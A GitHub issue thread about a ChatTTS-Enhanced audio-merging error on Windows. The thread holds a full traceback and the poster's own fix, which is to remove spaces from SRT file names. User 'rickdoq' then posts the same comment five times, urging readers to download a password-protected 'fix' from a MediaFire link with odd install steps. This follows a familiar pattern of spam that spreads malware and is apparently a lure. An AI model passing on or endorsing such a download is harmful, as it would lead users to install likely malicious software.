### ISSUE TITLE
Unable to find a suitable output format

### ISSUE THREAD

**Issue by banli17** [CCmahua/ChatTTS-Enhanced#21]
windows11 系统

检测过程是正常的，但是在 srt 生成完音频后， 合并时报错：

```
DUDU-ChatTTS增强版

版本:v3.0.0

正在检测当前系统环境...请稍等
当前程序CUDA版本: 11.8
当前系统CUDA版本: 11.8
启动中...请稍等

Running on local URL:  http://127.0.0.1:7860
INFO:httpx:HTTP Request: GET http://127.0.0.1:7860/startup-events "HTTP/1.1 200 OK"
INFO:httpx:HTTP Request: HEAD http://127.0.0.1:7860/ "HTTP/1.1 200 OK"

To create a public link, set `share=True` in `launch()`.

.............................................................

每个英语句子需要些什么成分？
WARNING:modules.ChatTTS.core:Invalid characters found! : {'？'}
  5%|███▉                                                                           | 103/2048 [00:02<00:44, 43.30it/s]
切片音频保存至: D:\DUDULab_ChatTTS_Ench_WIN_v3.0\output_audio\English Sentence Structure - English Grammar Lesson Chinese China DownloadYoutubeSubtitles.com\切片\English Sentence Structure - English Grammar Lesson Chinese China DownloadYoutubeSubtitles.com_10.wav
------ChatTTS生成完成------
[NULL @ 000001eda4ffec00] Unable to find a suitable output format for 'D:\DUDULab_ChatTTS_Ench_WIN_v3.0\output_audio\English'
D:\DUDULab_ChatTTS_Ench_WIN_v3.0\output_audio\English: Invalid argument
合并音频保存至: D:\DUDULab_ChatTTS_Ench_WIN_v3.0\output_audio\English Sentence Structure - English Grammar Lesson Chinese China DownloadYoutubeSubtitles.com\合并\English Sentence Structure - English Grammar Lesson Chinese China DownloadYoutubeSubtitles.com_合并.wav
Traceback (most recent call last):
  File "D:\DUDULab_ChatTTS_Ench_WIN_v3.0\Dlab\lib\site-packages\gradio\queueing.py", line 521, in process_events
    response = await route_utils.call_process_api(
  File "D:\DUDULab_ChatTTS_Ench_WIN_v3.0\Dlab\lib\site-packages\gradio\route_utils.py", line 276, in call_process_api
    output = await app.get_blocks().process_api(
  File "D:\DUDULab_ChatTTS_Ench_WIN_v3.0\Dlab\lib\site-packages\gradio\blocks.py", line 1945, in process_api
    result = await self.call_function(
  File "D:\DUDULab_ChatTTS_Ench_WIN_v3.0\Dlab\lib\site-packages\gradio\blocks.py", line 1513, in call_function
    prediction = await anyio.to_thread.run_sync(
  File "D:\DUDULab_ChatTTS_Ench_WIN_v3.0\Dlab\lib\site-packages\anyio\to_thread.py", line 56, in run_sync
    return await get_async_backend().run_sync_in_worker_thread(
  File "D:\DUDULab_ChatTTS_Ench_WIN_v3.0\Dlab\lib\site-packages\anyio\_backends\_asyncio.py", line 2177, in run_sync_in_worker_thread
    return await future
  File "D:\DUDULab_ChatTTS_Ench_WIN_v3.0\Dlab\lib\site-packages\anyio\_backends\_asyncio.py", line 859, in run
    result = context.run(func, *args)
  File "D:\DUDULab_ChatTTS_Ench_WIN_v3.0\Dlab\lib\site-packages\gradio\utils.py", line 831, in wrapper
    response = f(*args, **kwargs)
  File "D:\DUDULab_ChatTTS_Ench_WIN_v3.0\webui\output_option.py", line 95, in generate_audio
    original_audio_output,enhanced_audio_output, text = audio_pre_processor(audio_pre_Process_Params,enhance_parms,CHAT)
  File "D:\DUDULab_ChatTTS_Ench_WIN_v3.0\processors\audio_processor.py", line 89, in audio_pre_processor
    concatenated_or, concatenated_en =concatenate_audiofile(file_name,audio_files,enhanced_audio_files)
  File "D:\DUDULab_ChatTTS_Ench_WIN_v3.0\processors\concatente_processor.py", line 25, in concatenate_audiofile
    concatenated_wav, concatenated_sr = torchaudio.load(concatenated_audio_path)
  File "D:\DUDULab_ChatTTS_Ench_WIN_v3.0\Dlab\lib\site-packages\torchaudio\_backend\utils.py", line 204, in load
    return backend.load(uri, frame_offset, num_frames, normalize, channels_first, format, buffer_size)
  File "D:\DUDULab_ChatTTS_Ench_WIN_v3.0\Dlab\lib\site-packages\torchaudio\_backend\soundfile.py", line 27, in load
    return soundfile_backend.load(uri, frame_offset, num_frames, normalize, channels_first, format)
  File "D:\DUDULab_ChatTTS_Ench_WIN_v3.0\Dlab\lib\site-packages\torchaudio\_backend\soundfile_backend.py", line 221, in load
    with soundfile.SoundFile(filepath, "r") as file_:
  File "D:\DUDULab_ChatTTS_Ench_WIN_v3.0\Dlab\lib\site-packages\soundfile.py", line 658, in __init__
    self._file = self._open(file, mode_int, closefd)
  File "D:\DUDULab_ChatTTS_Ench_WIN_v3.0\Dlab\lib\site-packages\soundfile.py", line 1216, in _open
    raise LibsndfileError(err, prefix="Error opening {0!r}: ".format(self.name))
soundfile.LibsndfileError: Error opening 'D:\\DUDULab_ChatTTS_Ench_WIN_v3.0\\output_audio\\English Sentence Structure - English Grammar Lesson Chinese China DownloadYoutubeSubtitles.com\\合并\\English Sentence Structure - English Grammar Lesson Chinese China DownloadYoutubeSubtitles.com_合并.wav': System error.
```

**Comment by banli17** [comment]
已经解决， 是 srt 文件名的问题，文件名不能有空格字符

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
